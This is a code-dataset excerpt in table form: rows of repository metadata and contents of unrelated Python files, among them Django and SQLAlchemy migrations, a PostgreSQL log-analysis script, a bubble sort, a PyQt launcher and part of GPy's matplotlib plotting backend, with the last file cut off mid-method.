blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
98ac2964ff10598c3fddd341223f1ebabd976588 | f9b465ca5aa3f82afbe044b4eea67046f4668540 | /prac_07/languages.py | af6c6533e1aef4fa65f498e5b251e8efb18298a4 | [] | no_license | TylerLangtry/CP1404_Practicals | 125dd1cc38cbee11a8ee28fd8ff9f56a59cbe1dd | 2b013c0397886d889c6870fef0e4dc611040f087 | refs/heads/master | 2021-04-03T05:08:36.596570 | 2018-05-22T00:37:47 | 2018-05-22T00:37:47 | 124,964,235 | 0 | 0 | null | 2018-03-27T00:55:18 | 2018-03-12T23:29:27 | Python | UTF-8 | Python | false | false | 539 | py | from prac_07.programming_language import ProgrammingLanguage
# Demonstrate the ProgrammingLanguage class: create sample instances and
# report which languages are dynamically typed.
ruby = ProgrammingLanguage("Ruby", "Dynamic", True, 1995)
print(ruby)
python = ProgrammingLanguage("Python", "Dynamic", True, 1991)
print(python)
visual_basic = ProgrammingLanguage("Visual Basic", "Static", False, 1991)
print(visual_basic)
programs = [ruby, python, visual_basic]
print("The dynamically typed languages are:")
for program in programs:
    if program.is_dynamic():
        print(program.name)
# Fixed: the original printed the generator object itself
# (print(<genexpr>)), not the names; materialise the names first.
print([program.name for program in programs if program.is_dynamic()])
"tyler.langtry@my.jcu.edu.au"
] | tyler.langtry@my.jcu.edu.au |
a489cb86e3d6939f0b958404a7c004ab41e60639 | 27d500f0580c0a4dc19fa2be79a04abca1371ca6 | /foods/migrations/0004_auto_20210226_1840.py | 9d9893883a3ad48ccc690535bd8a09629ff4a689 | [] | no_license | farimaz/Restaurant-Django | 22926701fd4288d4fc1416196336675cc0e2adee | 76d97d67185f0a48f48ef38adc591be8285a18af | refs/heads/master | 2023-04-04T06:26:45.043182 | 2021-04-16T13:01:49 | 2021-04-16T13:01:49 | 358,606,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 548 | py | # Generated by Django 3.1.6 on 2021-02-26 15:10
from django.db import migrations, models
class Migration(migrations.Migration):
    """Restrict ``Foods.type_food`` to a fixed set of meal-type choices."""

    # Must run after the migration that first added the ``type_food`` field.
    dependencies = [
        ('foods', '0003_foods_type_food'),
    ]
    operations = [
        migrations.AlterField(
            model_name='foods',
            name='type_food',
            # Choices pair stored values with localized display labels.
            # NOTE(review): default 'drink' does not match any choice key
            # ('drinks' is the stored value) -- verify intended default.
            field=models.CharField(choices=[('breakfast', 'صبحانه'), ('drinks', 'نوشیدنی'), ('dinner', 'شام'), ('lunch', 'ناهار')], default='drink', max_length=10, verbose_name='نوع غذا'),
        ),
    ]
| [
"spacemazoochie@gmail.com"
] | spacemazoochie@gmail.com |
f6259ec0a87853d62adeaa4ed05a99c2c77530c2 | 90ea87947e0e1511b6f9312d1ec6f19619b1e90d | /test.py | e69343a676f1b8f03655efe07e6d466d1849a779 | [] | no_license | sahilgupta-gti/demo1 | 7ebb188ecb5a7bd5b1a3a669d18f6ea5f4dae1c2 | 6f1384c7fd7080af5051ea716173366bd74fdde9 | refs/heads/master | 2022-04-21T22:30:20.772440 | 2020-04-27T14:14:08 | 2020-04-27T14:14:08 | 163,744,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | #! /bin/python
#from numpy import *
# from array import *
import sys
from Student import *
# Read two integer demo arguments from the command line.
# NOTE(review): x and y are never used below -- possibly leftover scaffolding.
x = int(sys.argv[1])
y = int(sys.argv[2])
def factorial(f):
    """Return f! (the factorial of a non-negative integer f).

    Iterative implementation: unlike the previous recursive version it
    handles f == 0 correctly (the old base case ``f == 1`` recursed past
    zero forever) and cannot hit the recursion limit for large f.

    Raises:
        ValueError: if f is negative (factorial is undefined there).
    """
    if f < 0:
        raise ValueError("factorial() not defined for negative values")
    result = 1
    for i in range(2, f + 1):
        result *= i
    return result
# Factorial demo.
fact = 6
print(factorial(fact))
print(__name__)
# Exercise the Student class: per-instance data vs. the shared class attribute.
st1 = Student("Gunnu", "UKG")
print(st1.school, " : ", st1.getName(), " ", st1.getCls())
# Changing the class-level school name is visible through every instance
# that has not shadowed the attribute.
Student.setSchoolName("DAV")
st2 = Student("Sahil", "LKG")
print(st2.school, " : ", st2.getName(), " -- ", st2.getCls())
print("printing sum : ",st2.sum(1))
"sahilgupta_gti@yahoo.com"
] | sahilgupta_gti@yahoo.com |
755de45cae37769f8ee5cd50dd2018b09c93b4de | c7dae6ec1d683abe235c524b2a7f922acd0bee6d | /src/main.py | ba98e83190906a3f8fc9a7d1ff2c2353067f955e | [] | no_license | anjanabensy/Programslicer | 7374c181c6f4835ef12b9276a4d19473f1a28123 | 6faa340b8b6b92bb2defdd0f1c1677baba5b258f | refs/heads/master | 2022-12-13T21:43:34.172795 | 2020-09-09T07:28:59 | 2020-09-09T07:28:59 | 284,042,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,244 | py | import nltk
import ast
import re
import array as arr;
from _collections import deque
import lexer as lex
import slicer as s
import argparse
import traceback
# Module-level state shared by the helper functions below.
program = []        # full source text of the file being sliced
endline =''         # program point (line number) taken from the slice criterion
vars = ''
file =''
linecount=0         # number of lines in the loaded program
Slice = ''          # raw slice criterion string, e.g. "12,x"
lexer_result = []   # result of lex.tokenize_program: [tokens, identifiers, ...]
line_opt =[]        # output options gathered from the command line (--l/--o/--t)
""" checks whether the given slice criterion is valid with respect to the program to be sliced """
def validat_slice():
global linecount
global Slice
global lexer_result
count = 0
c1= 0
c2= 1
identifier_output = lexer_result[1]
slicepoint = (str(Slice).split(','))
lineno = slicepoint[0]
identifier = slicepoint[1]
if(int(lineno)>linecount):
print('Program point does not exist.Please enter a valid line number')
c1= 1
for i in identifier_output:
if(i.count(identifier)>=1):
c2=0
break
if(c2==1):
print('Variable does not exist within given program point.Please enter a valid variable')
count = c1+c2
return count
""" processes the slice criterion and passes the program to the lexer module """
def loadfile(file):
global endline
global linecount
global Slice
global lexer_result
valid = 1
#mylabel = tkinter.Label(root, text='')
#mylabel["text"]=''
f = 'Selected program'
if(file is not None):
proglist = list(str(program).split("\n"))
linecount= 0
for k in proglist:
linecount=linecount+1
f = f+'\n'+str(linecount)+'.'+k
print(f)
lexer_result = lex.tokenize_program(program)
c=0
while(valid>0):
c=c+1
Slice = input("\nEnter the slice criteria (p, V):")
valid = validat_slice()
return [Slice,lexer_result]
""" sends the program and slicing criterion to the slicer module to perform the slicing"""
def getfile(program,Slice,lexer_result,filepath):
global endline
global vars
global line_opt
#print('slice val is ',slice)
if program is not None:
x = str(Slice).split(',')
endline = x[0]
var_value = x[1]
#res = lex.tokenize_program(program)
s.check_Indentation(lexer_result[0])
s.setfirstsliceno(x,lexer_result[0],lexer_result[1],lexer_result[2])
Finalvals = s.print_Slice(lexer_result[0],lexer_result[1],endline,line_opt,lexer_result[2],filepath,x)
s.clearvars()
line_opt.clear()
return Finalvals
#print(vars)
""" adds various command line options for the application and processes them """
def argsparseroption():
global line_opt
parser = argparse.ArgumentParser(add_help=False)
text = 'Slice criteria Format :s,v where s is the point of interest and v is the variable'
linetext = 'Prints the slice with the line numbers of the input program'
filetext = 'Writes the slice to the specified file and saves in src/progfiles folder'
tracetext = 'Prints the slice with trace back details'
parser.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS,
help=text)
requiredNamed = parser.add_argument_group('Required Arguments')
requiredNamed.add_argument('--f',help='file to be sliced',required=True)
parser.add_argument('--l', '--lineno', action='store_true',
help=linetext)
parser.add_argument('--o','--ofile', nargs='?', const='o', type=str,help=filetext)
parser.add_argument('--t', '--trace', action='store_true',
help=tracetext)
args = parser.parse_args()
if(args.f):
c = args.f
if(args.l):
line_opt.append('l')
if(args.o):
line_opt.append(args.o)
if(args.t):
line_opt.append('t')
return str(c)
""" executes the below mentioned functions when the module is executed for the first time """
if __name__ == '__main__':
try:
filepath = argsparseroption()
#filepath = input("Enter the filepath:")
f = open(filepath, 'r')
program = f.read()
res = loadfile(program)
getfile(program,res[0],res[1],filepath)
except Exception as e:
print(traceback.format_exc())
| [
"anjanabensy95@gmail.com"
] | anjanabensy95@gmail.com |
cc348ab4bec613d2e38dbef4d3ac3c828374b571 | 3439921d03520834cb425a74eb3fde9a18facebc | /bubble sort.py | bc88fca94eff5c2638b245b63b0aa3c45c440af2 | [] | no_license | msobanjo/vrbh_sim | 6f838ddf033f3303dfd716ff78e364428d8c10aa | 4c512aa112b9bd55e9d902665c025cf283ff9309 | refs/heads/master | 2021-01-15T14:02:37.391144 | 2016-03-13T19:18:31 | 2016-03-13T19:18:31 | 50,657,586 | 0 | 0 | null | 2016-01-29T11:09:29 | 2016-01-29T11:09:29 | null | UTF-8 | Python | false | false | 415 | py | import random
def bubbleSort(randomItems):
    """Sort ``randomItems`` in place, ascending, using bubble sort.

    After each outer pass the largest remaining value has bubbled to the
    end of the unsorted region, so the inner scan shrinks by one each time.
    """
    for unsorted_end in range(len(randomItems) - 1, 0, -1):
        for j in range(unsorted_end):
            if randomItems[j] > randomItems[j + 1]:
                # Tuple assignment swaps adjacent items without a temporary.
                randomItems[j], randomItems[j + 1] = randomItems[j + 1], randomItems[j]
# Build 10 random integers in [-50, 100]; show them before and after sorting.
randomItems = [random.randint(-50, 100) for c in range(10)]
print(randomItems)
bubbleSort(randomItems)
print(randomItems)
| [
"msobanjo@hotmail.com"
] | msobanjo@hotmail.com |
9619c9505c4078b5776f7baea641f09f202fc2d7 | dace991e0b45bc4e2169b551bb58297215c11c9c | /queries.py | 02a2ce6ee04e3590d953c73295858ef6be5f3b90 | [] | no_license | snehakale/Logs-Analysis-Project | f042b7f79c32227a72a2cfc8804800e2f910b031 | cbcd7270755c962afd00ccc9dd5111f3be0d8724 | refs/heads/master | 2021-07-12T03:56:37.975836 | 2017-10-11T17:15:19 | 2017-10-11T17:15:19 | 106,340,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,678 | py | #! /usr/bin/env python3
''' This file is a python program (version 3.6.2)
which makes a connection with the database,
creates and executes postgresql queries to get the logs information.
'''
# importing python DB-API
import psycopg2
# function to make a connection with the database and to get the cursor
def db_connect(database_name):
    """Open a connection to *database_name* and return (connection, cursor).

    Raises:
        psycopg2.Error: if the connection fails.  The previous bare
        ``except`` printed a message and implicitly returned ``None``,
        which made callers fail later with an opaque unpacking TypeError;
        now the diagnostic is printed and the real error propagates.
    """
    try:
        db = psycopg2.connect("dbname={}".format(database_name))
        cursor = db.cursor()
        return db, cursor
    except psycopg2.Error:
        print("Error while connecting to the database.")
        raise
# function to execute the queries and to get the results
def get_result():
    """Run the three log-analysis reports against the ``news`` database
    and print them: top 3 articles, author popularity, and high-error days.
    """
    db, cursor = db_connect("news")
    # To get the most popular 3 articles of all time
    # (joins articles to log hits by matching '/article/<slug>' paths).
    query1 = ("select a.title , count(l.path) from articles as a, log as l "
              "where '/article/'||a.slug like l.path "
              "group by a.title order by count(l.path) desc limit 3;")
    cursor.execute(query1)
    rows1 = cursor.fetchall()
    # printing the result
    print(" ")
    print("The most popular three articles of all time are :")
    for row in rows1:
        print('{} - {} views'.format(row[0], row[1]))
    # To get most popular article authors of all time
    query2 = ("select t.name, count(l.path) from authors as t "
              "join articles as a on t.id = a.author "
              "join log as l on '/article/'||a.slug = l.path "
              "group by t.name order by count(l.path) desc;")
    cursor.execute(query2)
    rows2 = cursor.fetchall()
    # printing the result
    print(" ")
    print("The most popular article authors of all time are :")
    for row in rows2:
        print('{} - {} views'.format(row[0], row[1]))
    # To get on which days did more than 1% of requests lead to errors
    # (compares per-day counts of HTTP 200 vs 404 responses).
    query3 = ("select l1.date1, ((errors*100)/(success+errors))::float "
              "as percentage "
              "from (select date(time) as date1, count(*) as success "
              "from log where status like '%200%' group by date(time)) as l1 "
              "join (select date(time) as date2, count(*) as errors "
              "from log where status like '%404%' group by date(time)) as l2 "
              "on l1.date1 = l2.date2 "
              "where ((errors*100)/(success + errors))::float "
              "> (0.01)::float;")
    cursor.execute(query3)
    rows3 = cursor.fetchall()
    # printing the result
    print(" ")
    print("Days which did more than 1% of requests lead to errors are :")
    for row in rows3:
        print('{:%m/%d/%y} - {} %'.format(row[0], row[1]))
    # closing the connection with databse
    db.close()
| [
"kalesneha88@gmail.com"
] | kalesneha88@gmail.com |
2613e2ef412ccf078a9d7d9382a5579ecc20064d | b8c2d5320a70fafd44bff028210694c4446ee296 | /Project2/venv/bin/pip | b219c25bca7358e7e94787d9435c39db4b2f85a3 | [] | no_license | kelseydeuth/202 | b6032a5ec378c4ead949e9c6727ddf5e4744a4bd | 246d8ed5d3662483ba71d220461e8bad843588f5 | refs/heads/master | 2020-05-07T16:39:25.028624 | 2019-06-10T16:41:47 | 2019-06-10T16:41:47 | 180,691,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | #!/Users/kelseydeuth/Workspace/202/Project2/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
| [
"kelseydeuth@Kelseys-MacBook-Pro.local"
] | kelseydeuth@Kelseys-MacBook-Pro.local | |
0dbfb93d76694fbd077ed77dc8a28f2efac852ef | 88f026696ef1d0ee362f559c22fae1beeaf00033 | /software/reference/code_reference/QT/DualScreenTest/main.py | 60a03e3cb9cd0a4e361e179d7388ee17aeeeddd8 | [] | no_license | OSURoboticsClub/Rover_2018_2019 | 2b1b67ecb98f2f9f13a1ec38ab9986a7729b85d2 | d615463cd3cbddf1531511a42364e13f3c179f54 | refs/heads/master | 2020-04-01T05:10:45.129837 | 2019-08-12T17:11:43 | 2019-08-12T17:11:43 | 152,893,228 | 8 | 5 | null | 2019-07-29T03:04:39 | 2018-10-13T16:48:35 | C++ | UTF-8 | Python | false | false | 3,077 | py | #!/usr/bin/env python
"""
Main file used to launch the Rover Base Station
No other files should be used for launching this application.
"""
#####################################
# Imports
#####################################
# Python native imports
import sys
from PyQt5 import QtWidgets, QtCore, uic
import signal
# Custom Imports
#####################################
# Global Variables
#####################################
UI_FILE_LEFT = "Resources/UI/RoverGui.ui"    # control-screen layout
UI_FILE_RIGHT = "Resources/UI/RoverGui2.ui"  # video-screen layout
# Load each .ui file once; loadUiType returns (form_class, base_class).
FORM_LEFT, BASE_UI_LEFT = uic.loadUiType(UI_FILE_LEFT)
FORM_RIGHT, BASE_UI_RIGHT = uic.loadUiType(UI_FILE_RIGHT)
LEFT_SCREEN_ID = 0
RIGHT_SCREEN_ID = 1
#####################################
# Application Class Definition
#####################################
class LeftWindow(BASE_UI_LEFT, FORM_LEFT):
    """Full-screen window shown on the left monitor (rover control UI)."""
    # Emitted to ask background threads to shut down.
    kill_threads_signal = QtCore.pyqtSignal()
    def __init__(self, parent=None):
        # noinspection PyArgumentList
        # NOTE(review): super(BASE_UI_LEFT, ...) starts the MRO search *after*
        # BASE_UI_LEFT rather than after LeftWindow -- confirm intentional.
        super(BASE_UI_LEFT, self).__init__(parent)
        self.setupUi(self)
#####################################
# Application Class Definition
#####################################
class RightWindow(BASE_UI_RIGHT, FORM_RIGHT):
    """Full-screen window shown on the right monitor (rover video UI)."""
    # Emitted to ask background threads to shut down.
    kill_threads_signal = QtCore.pyqtSignal()
    def __init__(self, parent=None):
        # noinspection PyArgumentList
        # NOTE(review): super(BASE_UI_RIGHT, ...) starts the MRO search *after*
        # BASE_UI_RIGHT rather than after RightWindow -- confirm intentional.
        super(BASE_UI_RIGHT, self).__init__(parent)
        self.setupUi(self)
#####################################
# Main Definition
#####################################
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal.SIG_DFL) # This allows the keyboard interrupt kill to work properly
application = QtWidgets.QApplication(sys.argv) # Create the base qt gui application
system_desktop = QtWidgets.QDesktopWidget() # This gets us access to the desktop geometry
app_window = LeftWindow() # Make a window in this application
app_window.setWindowTitle("Rover Control") # Sets the window title
app_window.setWindowFlags(app_window.windowFlags() | # Sets the windows flags to:
QtCore.Qt.FramelessWindowHint | # remove the border and frame on the application,
QtCore.Qt.WindowStaysOnTopHint | # and makes the window stay on top of all others
QtCore.Qt.X11BypassWindowManagerHint) # This is needed to show fullscreen in gnome
app_window.setGeometry(system_desktop.screenGeometry(LEFT_SCREEN_ID)) # Sets the window to be on the first screen
app_window.showFullScreen() # Shows the window in full screen mode
app_window2 = RightWindow()
app_window2.setWindowTitle("Rover Video")
app_window2.setWindowFlags(app_window.windowFlags() |
QtCore.Qt.FramelessWindowHint |
QtCore.Qt.WindowStaysOnTopHint |
QtCore.Qt.X11BypassWindowManagerHint)
app_window2.setGeometry(system_desktop.screenGeometry(RIGHT_SCREEN_ID))
app_window2.showFullScreen()
application.exec_() # Execute launching of the application
| [
"chayap@oregonstate.edu"
] | chayap@oregonstate.edu |
2f6bbc0794f3dde324782c7c71e14ddcb49364ff | 9a01c9106a4cc641a37ad072d841f5607a3deb63 | /migrations/versions/006_add_telegramm_id.py | ed18e08ed712cc257ff1b4137e29cdeed4d951a9 | [] | no_license | maddeer/bookshell | 51f761e08148d77b3841736c27aceba9d9357322 | 9d2cd33342109d1a996a366d100832632d4b11ad | refs/heads/master | 2021-07-22T17:58:46.476972 | 2017-11-04T13:04:58 | 2017-11-04T13:04:58 | 104,572,632 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | from sqlalchemy import *
from migrate import *
meta = MetaData()
def upgrade(migrate_engine):
    # Upgrade operations go here. Don't create your own engine; bind
    # migrate_engine to your metadata
    meta.bind = migrate_engine
    # Reflect the existing 'user' table and add a nullable telegram_id column.
    users_table = Table('user', meta, autoload=True)
    telegram_id = Column('telegram_id', Integer)
    telegram_id.create(users_table)
def downgrade(migrate_engine):
    # Operations to reverse the above upgrade go here.
    meta.bind = migrate_engine
    # Reflect the 'user' table and drop the telegram_id column added above.
    users_table = Table('user', meta, autoload=True)
    users_table.c.telegram_id.drop()
| [
"timonnius@gmail.com"
] | timonnius@gmail.com |
1856097d55982c651ccb71ab0b51f7fa59839318 | c7386a7a7aafabe9feb8368c42b607cff70dcfe7 | /01_GPLVM_Training/GPy/plotting/matplot_dep/plot_definitions.py | 0e3bc32d398084b4f35cc48526b06f520e9121e8 | [] | no_license | dechamoungsri/Prosody_modeling | 8f3d603af6c54786cb048186bab65cfcd5b441f1 | 7895a032dde1c2c34cf42b7c362ca2b61ada0f37 | refs/heads/master | 2021-08-31T02:32:42.813986 | 2017-12-20T06:42:36 | 2017-12-20T06:42:36 | 114,848,055 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,812 | py | #===============================================================================
# Copyright (c) 2015, Max Zwiessele
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of GPy.plotting.matplot_dep.plot_definitions nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
import numpy as np
from matplotlib import pyplot as plt
from ..abstract_plotting_library import AbstractPlottingLibrary
from .. import Tango
from . import defaults
from matplotlib.colors import LinearSegmentedColormap
from .controllers import ImshowController, ImAnnotateController
import itertools
from .util import legend_ontop
class MatplotlibPlots(AbstractPlottingLibrary):
    """Matplotlib backend for GPy's abstract plotting interface.

    Each method maps one abstract plotting primitive (scatter, plot, imshow,
    contour, ...) onto the corresponding matplotlib Axes call and returns the
    matplotlib artist(s), so callers can post-process them.

    Fix: uses the builtin ``bool``/``float`` dtypes instead of the ``np.bool``
    / ``np.float`` aliases, which were removed in NumPy 1.20+ (identical
    behavior on older NumPy -- the aliases were plain re-exports).
    """
    def __init__(self):
        super(MatplotlibPlots, self).__init__()
        self._defaults = defaults.__dict__

    def figure(self, rows=1, cols=1, gridspec_kwargs={}, tight_layout=True, **kwargs):
        """Create a figure carrying a rows x cols GridSpec for later subplots."""
        fig = plt.figure(tight_layout=tight_layout, **kwargs)
        fig.rows = rows
        fig.cols = cols
        fig.gridspec = plt.GridSpec(rows, cols, **gridspec_kwargs)
        return fig

    def new_canvas(self, figure=None, row=1, col=1, projection='2d', xlabel=None, ylabel=None, zlabel=None, title=None, xlim=None, ylim=None, zlim=None, **kwargs):
        """Return (axes, leftover_kwargs) for the requested grid cell, creating a figure if needed."""
        if projection == '3d':
            from mpl_toolkits.mplot3d import Axes3D
        elif projection == '2d':
            projection = None
        if 'ax' in kwargs:
            ax = kwargs.pop('ax')
        else:
            if figure is not None:
                fig = figure
            elif 'num' in kwargs and 'figsize' in kwargs:
                fig = self.figure(num=kwargs.pop('num'), figsize=kwargs.pop('figsize'))
            elif 'num' in kwargs:
                fig = self.figure(num=kwargs.pop('num'))
            elif 'figsize' in kwargs:
                fig = self.figure(figsize=kwargs.pop('figsize'))
            else:
                fig = self.figure()
            #if hasattr(fig, 'rows') and hasattr(fig, 'cols'):
            ax = fig.add_subplot(fig.gridspec[row-1, col-1], projection=projection)
        if xlim is not None: ax.set_xlim(xlim)
        if ylim is not None: ax.set_ylim(ylim)
        if xlabel is not None: ax.set_xlabel(xlabel)
        if ylabel is not None: ax.set_ylabel(ylabel)
        if title is not None: ax.set_title(title)
        if projection == '3d':
            if zlim is not None: ax.set_zlim(zlim)
            if zlabel is not None: ax.set_zlabel(zlabel)
        return ax, kwargs

    def add_to_canvas(self, ax, plots, legend=False, title=None, **kwargs):
        """Attach legend/title to the axes; ``legend`` >= 1 selects an on-top legend with that many columns."""
        #ax.autoscale_view()
        fontdict=dict(family='sans-serif', weight='light', size=9)
        if legend is True:
            ax.legend(*ax.get_legend_handles_labels())
        elif legend >= 1:
            #ax.legend(prop=fontdict)
            legend_ontop(ax, ncol=legend, fontdict=fontdict)
        if title is not None: ax.figure.suptitle(title)
        return ax

    def show_canvas(self, ax):
        """Force a redraw and return the figure."""
        ax.figure.canvas.draw()
        return ax.figure

    def scatter(self, ax, X, Y, Z=None, color=Tango.colorsHex['mediumBlue'], label=None, marker='o', **kwargs):
        """Scatter plot; Z switches to a 3D scatter."""
        if Z is not None:
            return ax.scatter(X, Y, c=color, zs=Z, label=label, marker=marker, **kwargs)
        return ax.scatter(X, Y, c=color, label=label, marker=marker, **kwargs)

    def plot(self, ax, X, Y, Z=None, color=None, label=None, **kwargs):
        """Line plot; Z switches to a 3D line."""
        if Z is not None:
            return ax.plot(X, Y, color=color, zs=Z, label=label, **kwargs)
        return ax.plot(X, Y, color=color, label=label, **kwargs)

    def plot_axis_lines(self, ax, X, color=Tango.colorsHex['darkRed'], label=None, **kwargs):
        """Mark input locations as upward ticks along the x axis (or base plane in 3D)."""
        from matplotlib import transforms
        from matplotlib.path import Path
        if 'marker' not in kwargs:
            # Custom arrow-head marker pointing up from the axis.
            kwargs['marker'] = Path([[-.2,0.], [-.2,.5], [0.,1.], [.2,.5], [.2,0.], [-.2,0.]],
                                    [Path.MOVETO, Path.LINETO, Path.LINETO, Path.LINETO, Path.LINETO, Path.CLOSEPOLY])
        if 'transform' not in kwargs:
            if X.shape[1] == 1:
                # x in data coordinates, y in axes coordinates (pinned to bottom).
                kwargs['transform'] = transforms.blended_transform_factory(ax.transData, ax.transAxes)
        if X.shape[1] == 2:
            return ax.scatter(X[:,0], X[:,1], ax.get_zlim()[0], c=color, label=label, **kwargs)
        return ax.scatter(X, np.zeros_like(X), c=color, label=label, **kwargs)

    def barplot(self, ax, x, height, width=0.8, bottom=0, color=Tango.colorsHex['mediumBlue'], label=None, **kwargs):
        """Vertical bar plot centered on x by default."""
        if 'align' not in kwargs:
            kwargs['align'] = 'center'
        # NOTE(review): ``left=`` was renamed to ``x=`` in matplotlib 2.2 and
        # removed in 3.0 -- update if targeting modern matplotlib.
        return ax.bar(left=x, height=height, width=width,
                      bottom=bottom, label=label, color=color,
                      **kwargs)

    def xerrorbar(self, ax, X, Y, error, color=Tango.colorsHex['darkRed'], label=None, **kwargs):
        """Horizontal error bars only (no connecting line unless requested)."""
        if not('linestyle' in kwargs or 'ls' in kwargs):
            kwargs['ls'] = 'none'
        #if Z is not None:
        #    return ax.errorbar(X, Y, Z, xerr=error, ecolor=color, label=label, **kwargs)
        return ax.errorbar(X, Y, xerr=error, ecolor=color, label=label, **kwargs)

    def yerrorbar(self, ax, X, Y, error, color=Tango.colorsHex['darkRed'], label=None, **kwargs):
        """Vertical error bars only (no connecting line unless requested)."""
        if not('linestyle' in kwargs or 'ls' in kwargs):
            kwargs['ls'] = 'none'
        #if Z is not None:
        #    return ax.errorbar(X, Y, Z, yerr=error, ecolor=color, label=label, **kwargs)
        return ax.errorbar(X, Y, yerr=error, ecolor=color, label=label, **kwargs)

    def imshow(self, ax, X, extent=None, label=None, vmin=None, vmax=None, **imshow_kwargs):
        """Image display with origin at the lower-left by default."""
        if 'origin' not in imshow_kwargs:
            imshow_kwargs['origin'] = 'lower'
        #xmin, xmax, ymin, ymax = extent
        #xoffset, yoffset = (xmax - xmin) / (2. * X.shape[0]), (ymax - ymin) / (2. * X.shape[1])
        #xmin, xmax, ymin, ymax = extent = xmin-xoffset, xmax+xoffset, ymin-yoffset, ymax+yoffset
        return ax.imshow(X, label=label, extent=extent, vmin=vmin, vmax=vmax, **imshow_kwargs)

    def imshow_interact(self, ax, plot_function, extent, label=None, resolution=None, vmin=None, vmax=None, **imshow_kwargs):
        """Interactive imshow that re-evaluates plot_function on pan/zoom."""
        if imshow_kwargs is None: imshow_kwargs = {}
        if 'origin' not in imshow_kwargs:
            imshow_kwargs['origin'] = 'lower'
        return ImshowController(ax, plot_function, extent, resolution=resolution, vmin=vmin, vmax=vmax, **imshow_kwargs)

    def annotation_heatmap(self, ax, X, annotation, extent=None, label=None, imshow_kwargs=None, **annotation_kwargs):
        """Heatmap with one centered text annotation per cell; returns (image, annotations)."""
        if imshow_kwargs is None: imshow_kwargs = {}
        if 'origin' not in imshow_kwargs:
            imshow_kwargs['origin'] = 'lower'
        if ('ha' not in annotation_kwargs) and ('horizontalalignment' not in annotation_kwargs):
            annotation_kwargs['ha'] = 'center'
        if ('va' not in annotation_kwargs) and ('verticalalignment' not in annotation_kwargs):
            annotation_kwargs['va'] = 'center'
        imshow = self.imshow(ax, X, extent, label, **imshow_kwargs)
        if extent is None:
            extent = (0, X.shape[0], 0, X.shape[1])
        xmin, xmax, ymin, ymax = extent
        # Half-cell offsets center each annotation inside its pixel.
        xoffset, yoffset = (xmax - xmin) / (2. * X.shape[0]), (ymax - ymin) / (2. * X.shape[1])
        xlin = np.linspace(xmin, xmax, X.shape[0], endpoint=False)
        ylin = np.linspace(ymin, ymax, X.shape[1], endpoint=False)
        annotations = []
        for [i, x], [j, y] in itertools.product(enumerate(xlin), enumerate(ylin)):
            annotations.append(ax.text(x+xoffset, y+yoffset, "{}".format(annotation[j, i]), **annotation_kwargs))
        return imshow, annotations

    def annotation_heatmap_interact(self, ax, plot_function, extent, label=None, resolution=15, imshow_kwargs=None, **annotation_kwargs):
        """Interactive annotated heatmap re-evaluated on pan/zoom."""
        if imshow_kwargs is None: imshow_kwargs = {}
        if 'origin' not in imshow_kwargs:
            imshow_kwargs['origin'] = 'lower'
        return ImAnnotateController(ax, plot_function, extent, resolution=resolution, imshow_kwargs=imshow_kwargs or {}, **annotation_kwargs)

    def contour(self, ax, X, Y, C, levels=20, label=None, **kwargs):
        """Contour plot with ``levels`` evenly spaced levels over C's range."""
        return ax.contour(X, Y, C, levels=np.linspace(C.min(), C.max(), levels), label=label, **kwargs)

    def surface(self, ax, X, Y, Z, color=None, label=None, **kwargs):
        """3D surface plot."""
